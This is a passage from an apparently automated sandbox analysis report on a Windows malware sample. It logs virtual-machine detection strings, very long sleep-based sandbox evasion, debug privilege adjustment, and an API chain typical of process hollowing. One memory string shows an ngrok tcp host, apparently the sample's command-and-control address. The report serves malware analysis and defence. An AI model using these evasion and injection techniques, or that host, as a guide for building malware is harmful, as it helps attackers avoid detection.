        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe - Code function: VBoxS VBoxS 1_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Code function: VBoxS VBoxS 5_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Code function: VBoxS VBoxS 14_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Code function: VBoxS VBoxS 18_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Code function: VBoxS VBoxS 22_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe - Evasive API call chain: GetPEB, DecisionNodes, Sleep graph_1-2421
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Evasive API call chain: GetPEB, DecisionNodes, Sleep graph_5-2420
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe - File opened: C:\myapp.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - File opened: C:\myapp.exe (4 identical entries)
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe - Memory allocated: F30000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe - Memory allocated: 2B80000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe - Memory allocated: 4B80000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe - Memory allocated: 62C0000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe - Memory allocated: 72C0000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: CC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 2D30000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 10D0000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 6650000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 7650000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 78A0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 88A0000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 8B40000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 9B40000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: AB40000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: BB40000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: CB40000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 78A0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 88A0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 98A0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 6650000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 9BE0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: ABE0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: D070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: E070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: F070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 10070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 11070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: B0E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 12070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 13070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 14070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 15070000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 16070000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 16AC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 17AC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 18AC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 19AC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 1AAC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 1BAC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 1CAC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 1DAC0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: C6E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: D6E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: E6E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: F6E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 106E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 116E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 126E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 136E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 146E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: D460000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: E460000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: F460000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 10460000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 11460000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 12460000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 13460000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe - Memory allocated: 14460000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1EAC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1FAC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 20AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 21AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 22AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 23AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 24AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 25AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 26AC0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 27AC0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 28F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: EFE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: FFE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 10FE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 11FE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 12FE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13FE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 155A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 165A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 175A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 185A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 195A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1A5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1B5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1C5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1D5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1E5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1F5A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 205A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F4E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 104E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 114E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13120000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14120000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 215A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 225A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 235A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 245A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 255A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 265A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 29F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2AF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2BF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2CF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F8A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13120000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2DF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2EF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2FF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 30F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 31F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 32F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 33F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F8A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F8A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 34F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 35F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 36F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 37F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 38F60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14220000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2AF60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14220000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 10D0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: DD0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2BB0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 4BB0000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F30000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2C00000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: F30000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWindow / User API: threadDelayed 1327Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWindow / User API: threadDelayed 1175Jump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeDropped PE file which has not been started: C:\Users\user\Desktop\iR2UtZj5vP.exeJump to dropped file
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to dropped file
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeDropped PE file which has not been started: C:\Users\user\Desktop\iR2UtZj5vP.exex (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe TID: 8124Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe TID: 8128Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7504Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7612Thread sleep time: -663500s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7612Thread sleep time: -587500s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 2168Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 6020Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 3392Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 3408Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 3528Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 996Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7208Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: WindowsServices.exe, 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: VBoxServiceTrueTEMP'WindowsServices.exe#0.tcp.in.ngrok.io
        Source: WindowsServices.exe, 00000019.00000002.1920647174.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxService
        Source: netsh.exe, 0000000C.00000003.1542415092.0000000003271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: iR2UtZj5vP.exe, 00000004.00000002.1424770277.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeAPI call chain: ExitProcess graph end nodegraph_1-2472
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeAPI call chain: ExitProcess graph end nodegraph_1-2558
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_5-2471
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_5-2557
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_14-2472
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_14-2555
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_14-2554
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_18-2472
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_18-2555
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_18-2554
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_22-2472
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_22-2555
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeAPI call chain: ExitProcess graph end nodegraph_22-2554
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 mov eax, dword ptr fs:[00000030h]1_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_00405A10 mov eax, dword ptr fs:[00000030h]5_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_00405A10 mov eax, dword ptr fs:[00000030h]14_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_00405A10 mov eax, dword ptr fs:[00000030h]18_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_00405A10 mov eax, dword ptr fs:[00000030h]22_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess token adjusted: DebugJump to behavior
